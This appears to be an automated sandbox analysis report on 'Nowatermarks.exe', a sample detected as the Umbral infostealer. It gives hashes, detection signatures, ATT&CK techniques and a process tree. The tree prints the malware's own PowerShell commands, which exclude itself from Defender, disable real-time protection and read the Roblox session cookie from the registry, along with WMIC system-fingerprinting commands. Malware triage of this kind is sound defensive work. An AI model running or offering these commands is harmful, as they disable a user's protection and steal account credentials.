Resubmissions
09-08-2024 17:20
240809-vwc9aataqn 1009-08-2024 17:16
240809-vtg5fsxblb 1008-08-2024 19:08
240808-xtpkmsxgmn 10Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
08-08-2024 19:08
Behavioral task
behavioral1
Sample
Nowatermarks.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Nowatermarks.exe
Resource
win10v2004-20240802-en
General
-
Target
Nowatermarks.exe
-
Size
227KB
-
MD5
926ac9e42778634f5c2580a913d83f62
-
SHA1
e36c92f542a4c010c9cbbdb91df84ec2e16ac62f
-
SHA256
4916686177420dca945e81aebaf2fc098c21ddb74fbbf9d0f6f2adaf37f218e8
-
SHA512
e415af55a761d060dfd56f77491d853edb806c5e2337460fb7df8ac76f986e7a89904caa913b56fcbf19e0f3e084a71ef1a13336cf7aa73cdd52c342ff8375c6
-
SSDEEP
6144:+loZMCrIkd8g+EtXHkv/iD475jhDJ6idOIJbGmTLFb8e1mYi:ooZZL+EP875jhDJ6idOIJbGmTJu
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2328-1-0x0000000000CF0000-0x0000000000D30000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 2276 powershell.exe 2604 powershell.exe 444 powershell.exe 2876 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 7 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1628 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2876 powershell.exe 2276 powershell.exe 2604 powershell.exe 2352 powershell.exe 444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2328 Nowatermarks.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeIncreaseQuotaPrivilege 552 wmic.exe Token: SeSecurityPrivilege 552 wmic.exe Token: SeTakeOwnershipPrivilege 552 wmic.exe Token: SeLoadDriverPrivilege 552 wmic.exe Token: SeSystemProfilePrivilege 552 wmic.exe Token: SeSystemtimePrivilege 552 wmic.exe Token: SeProfSingleProcessPrivilege 552 wmic.exe Token: SeIncBasePriorityPrivilege 552 wmic.exe Token: SeCreatePagefilePrivilege 552 wmic.exe Token: SeBackupPrivilege 552 wmic.exe Token: SeRestorePrivilege 552 wmic.exe Token: SeShutdownPrivilege 552 wmic.exe Token: SeDebugPrivilege 552 wmic.exe Token: SeSystemEnvironmentPrivilege 552 wmic.exe Token: SeRemoteShutdownPrivilege 552 wmic.exe Token: SeUndockPrivilege 552 wmic.exe Token: SeManageVolumePrivilege 552 wmic.exe Token: 33 552 wmic.exe Token: 34 552 wmic.exe Token: 35 552 wmic.exe Token: SeIncreaseQuotaPrivilege 552 wmic.exe Token: SeSecurityPrivilege 552 wmic.exe Token: SeTakeOwnershipPrivilege 552 wmic.exe Token: SeLoadDriverPrivilege 552 wmic.exe Token: SeSystemProfilePrivilege 552 wmic.exe Token: SeSystemtimePrivilege 552 wmic.exe Token: SeProfSingleProcessPrivilege 552 wmic.exe Token: SeIncBasePriorityPrivilege 552 wmic.exe Token: SeCreatePagefilePrivilege 552 wmic.exe Token: SeBackupPrivilege 552 wmic.exe Token: SeRestorePrivilege 552 wmic.exe Token: SeShutdownPrivilege 552 wmic.exe Token: SeDebugPrivilege 552 wmic.exe Token: SeSystemEnvironmentPrivilege 552 wmic.exe Token: SeRemoteShutdownPrivilege 552 wmic.exe Token: SeUndockPrivilege 552 wmic.exe Token: SeManageVolumePrivilege 552 wmic.exe Token: 33 552 wmic.exe Token: 34 552 wmic.exe Token: 35 552 wmic.exe Token: SeIncreaseQuotaPrivilege 1420 wmic.exe Token: SeSecurityPrivilege 1420 wmic.exe Token: SeTakeOwnershipPrivilege 1420 wmic.exe Token: SeLoadDriverPrivilege 1420 wmic.exe Token: SeSystemProfilePrivilege 1420 wmic.exe Token: SeSystemtimePrivilege 1420 wmic.exe Token: SeProfSingleProcessPrivilege 1420 wmic.exe Token: SeIncBasePriorityPrivilege 1420 wmic.exe Token: SeCreatePagefilePrivilege 1420 wmic.exe Token: SeBackupPrivilege 1420 wmic.exe Token: SeRestorePrivilege 1420 wmic.exe Token: SeShutdownPrivilege 1420 wmic.exe Token: SeDebugPrivilege 1420 wmic.exe Token: SeSystemEnvironmentPrivilege 1420 wmic.exe Token: SeRemoteShutdownPrivilege 1420 wmic.exe Token: SeUndockPrivilege 1420 wmic.exe Token: SeManageVolumePrivilege 1420 wmic.exe Token: 33 1420 wmic.exe Token: 34 1420 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2876 2328 Nowatermarks.exe 30 PID 2328 wrote to memory of 2876 2328 Nowatermarks.exe 30 PID 2328 wrote to memory of 2876 2328 Nowatermarks.exe 30 PID 2328 wrote to memory of 2276 2328 Nowatermarks.exe 32 PID 2328 wrote to memory of 2276 2328 Nowatermarks.exe 32 PID 2328 wrote to memory of 2276 2328 Nowatermarks.exe 32 PID 2328 wrote to memory of 2604 2328 Nowatermarks.exe 34 PID 2328 wrote to memory of 2604 2328 Nowatermarks.exe 34 PID 2328 wrote to memory of 2604 2328 Nowatermarks.exe 34 PID 2328 wrote to memory of 2352 2328 Nowatermarks.exe 36 PID 2328 wrote to memory of 2352 2328 Nowatermarks.exe 36 PID 2328 wrote to memory of 2352 2328 Nowatermarks.exe 36 PID 2328 wrote to memory of 552 2328 Nowatermarks.exe 38 PID 2328 wrote to memory of 552 2328 Nowatermarks.exe 38 PID 2328 wrote to memory of 552 2328 Nowatermarks.exe 38 PID 2328 wrote to memory of 1420 2328 Nowatermarks.exe 41 PID 2328 wrote to memory of 1420 2328 Nowatermarks.exe 41 PID 2328 wrote to memory of 1420 2328 Nowatermarks.exe 41 PID 2328 wrote to memory of 1092 2328 Nowatermarks.exe 43 PID 2328 wrote to memory of 1092 2328 Nowatermarks.exe 43 PID 2328 wrote to memory of 1092 2328 Nowatermarks.exe 43 PID 2328 wrote to memory of 444 2328 Nowatermarks.exe 45 PID 2328 wrote to memory of 444 2328 Nowatermarks.exe 45 PID 2328 wrote to memory of 444 2328 Nowatermarks.exe 45 PID 2328 wrote to memory of 1628 2328 Nowatermarks.exe 47 PID 2328 wrote to memory of 1628 2328 Nowatermarks.exe 47 PID 2328 wrote to memory of 1628 2328 Nowatermarks.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe"C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:444
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1628
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8FGY07ROES8EH7UJEX9.temp
Filesize7KB
MD584202321f326a025f1de4bfeb3f2b720
SHA1e16947c5065bb8ed26eade71e33d4807b614bd82
SHA25699f166e7350821c67b42a9b0b11a4bd4398d0f01de7bb3bc204f0c8d0db3a03b
SHA512be33f82329b47875483c287fe7ccedffe3cf82f176b26bb3263aba8f2e45c7c73ca49e34642e39d40a33bc266f2e539e0cfc34a065b00ae85dd71f469be80a40